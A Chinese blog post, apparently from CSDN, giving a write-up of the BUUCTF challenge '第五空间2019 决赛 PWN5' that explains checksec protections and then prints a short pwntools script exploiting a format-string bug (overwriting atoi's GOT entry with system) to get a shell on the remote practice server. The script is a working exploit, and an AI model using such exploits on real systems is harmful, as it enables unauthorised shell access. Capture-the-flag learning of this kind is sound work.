[第五空间2019 决赛]PWN5,checksec

最新推荐文章于 2024-04-26 16:05:05 发布
最新推荐文章于 2024-04-26 16:05:05 发布
阅读量926 收藏
点赞数
分类专栏: ctf pwn 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50879937/article/details/126942163
版权
ctf 同时被 2 个专栏收录
8 篇文章 0 订阅
订阅专栏
pwn
1 篇文章 0 订阅
订阅专栏

主要以PWN5这题讲一下关于checksec的一些用法

题目

首先介绍一下checksec

直接使用checksec pwn解析
在这里插入图片描述
Arch:用来判断是拖进64位IDA还是32位

RELRO:此项技术主要针对 GOT 改写的攻击方式。它分为两种,Partial RELRO 和 Full RELRO。
Partial RELRO 易受到攻击,例如攻击者可以atoi.got为system.plt,进而输入/bin/sh\x00获得shell
Full RELRO 使整个 GOT 只读,从而无法被覆盖,但这样会大大增加程序的启动时间,因为程序在启动之前需要解析所有的符号。

Stack:栈溢出保护是一种缓冲区溢出攻击缓解手段

NX:NX enabled开启就是意味着栈中数据没有执行权限,如此一来, 当攻击者在堆栈上部署自己的 shellcode 并触发时, 只会直接造成程序的崩溃,但是可以利用rop这种方法绕过

PIE:这个是地址空间分布随机化

解析

使用IDA32编译
在这里插入图片描述
结合checksec可知格式化字符串漏洞
在这里插入图片描述
直接gdb pwn
下断点,执行输入变量name
在这里插入图片描述
步入并查看寄存器的值使用ni

看栈
在这里插入图片描述
查看格式化字符串偏移 fmtarg
在这里插入图片描述

直接编写脚本

from pwn import *
# p = process('./pwn')
p = remote('node4.buuoj.cn',27035)
elf = ELF('./pwn')

atoi_got = elf.got['atoi']
system_plt = elf.plt['system']

payload=fmtstr_payload(10,{atoi_got:system_plt}) //转移函数
p.sendline(payload)
p.sendline(b'/bin/sh\x00')

p.interactive()

在这里插入图片描述
在这里插入图片描述

OK,纸上得来终觉浅,绝知此事要躬行!!!

参考链接https://www.cnblogs.com/murkuo/p/16322688.html

最爱喝面条
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2551
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
PWN-最新checksec的安装和使用
qq_43430261的博客
04-14 1万+
安装 用git安装 $ git clone https://github.com/slimm609/checksec.sh.git 进入文件内 cd checksec.sh 执行下面这条命令,在命令行中建立符号链接就可以在terminal中直接使用了 sudo ln -s checksec /usr/local/bin/checksec #或者sudo ln -sf checksec /us...
Pwn 二进制漏洞审计
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-28 3333
PWN 二进制漏洞审计
CTF-pwn pwntools用法探索_usage pwn checksec [-h] [--file [elf
最新发布
2401_84254011的博客
04-26 385
options:options:options:options:options:options:options:options:options:还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
checksec检查可执行文件时,可以获得一系列与安全相关的属性信息。这些信息有助于开发者和安全专家评估目标程序的安全性,并采取必要的措施来增强安全性。
Jingged的博客
03-12 1156
此外,为了确保二进制文件的安全性,除了使用checksec进行检查外,还应结合其他安全最佳实践,如使用最新的编译器和安全选项进行编译,实施最小权限原则,以及定期更新和修补安全漏洞等。请注意,checksec的输出可能会因不同的系统和工具版本而略有不同。因此,在实际使用中,最好查阅checksec的官方文档或相关资源,以获取最准确和最新的信息。在checksec的输出中,每个安全特性的开启和关闭状态都有特定的表示。执行这个命令后,checksec会输出关于该可执行文件的一系列安全特性的状态信息。
Python库 | checksec.py-0.6.1.tar.gz
04-07
资源分类:Python库 所属语言:Python 资源全名:checksec.py-0.6.1.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
checksec
Trick的博客
11-10 2741
checksec checksec到底是用来干什么的? 它是用来检查可执行文件属性,例如PIE, RELRO, PaX, Canaries, ASLR, Fortify Source等等属性。 我们在ubuntu下使用它时,会显示有5行信息: 1.Arch 从这行信息可以知道程序是32bit还是64bit的 2.RELRO 3.Stack 显示Stack:No canary found则表示可以利用栈溢出 编译时控制是否开启栈保护以及程度: gcc -fno-stack-protector -o test
安全编译选项检测工具
breakingb的博客
02-18 1741
安全编译选项检测工具,elf文件检测
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 610
简单易懂~
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
pwn学习总结
Ree的整理与收集
09-01 5746
遇到的优秀文章 关于Heap Overflow(堆溢出) Linux常见漏洞利用技术实践 GCC 中的编译器堆栈保护技术 Linux环境进程间通信(一) 现代Linux操作系统的栈溢出(一) 解读Linux安全机制之栈溢出保护工具与常用命令*nix命令 export ...="..." 添加一个环境变量,这个环境变量只在这个shell进程中起作用 gdbgdb的话一定会装peda插件。p
[第五空间2019 决赛]PWN5
qq_41853048的博客
06-15 104
今年国赛线下awdp,逆向手坐牢,临时抱佛脚吧。
【工具篇(持续更新)】pwn中常使用的工具
qq_21746331的博客
03-12 3942
pwn中常使用的工具前言0x1 pwntoolspwntools安装 前言   pwn作为CTF比赛中的重要一部分,用到的工具不及其他部分的多,但是工具相对来说也比较难用。主要用的工具有:pwn-tools、 0x1 pwntools pwntools是一个用Python编写的CTF框架和开发库,旨在快速构建原型和开发,并旨在使编写利用脚本尽可能简单。 pwntools安装 ...
Pwn笔记
caterpillarous的博客
04-18 2631
Pwn笔记 -前言 以下内容摘自Wiki: Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。 在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或...
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值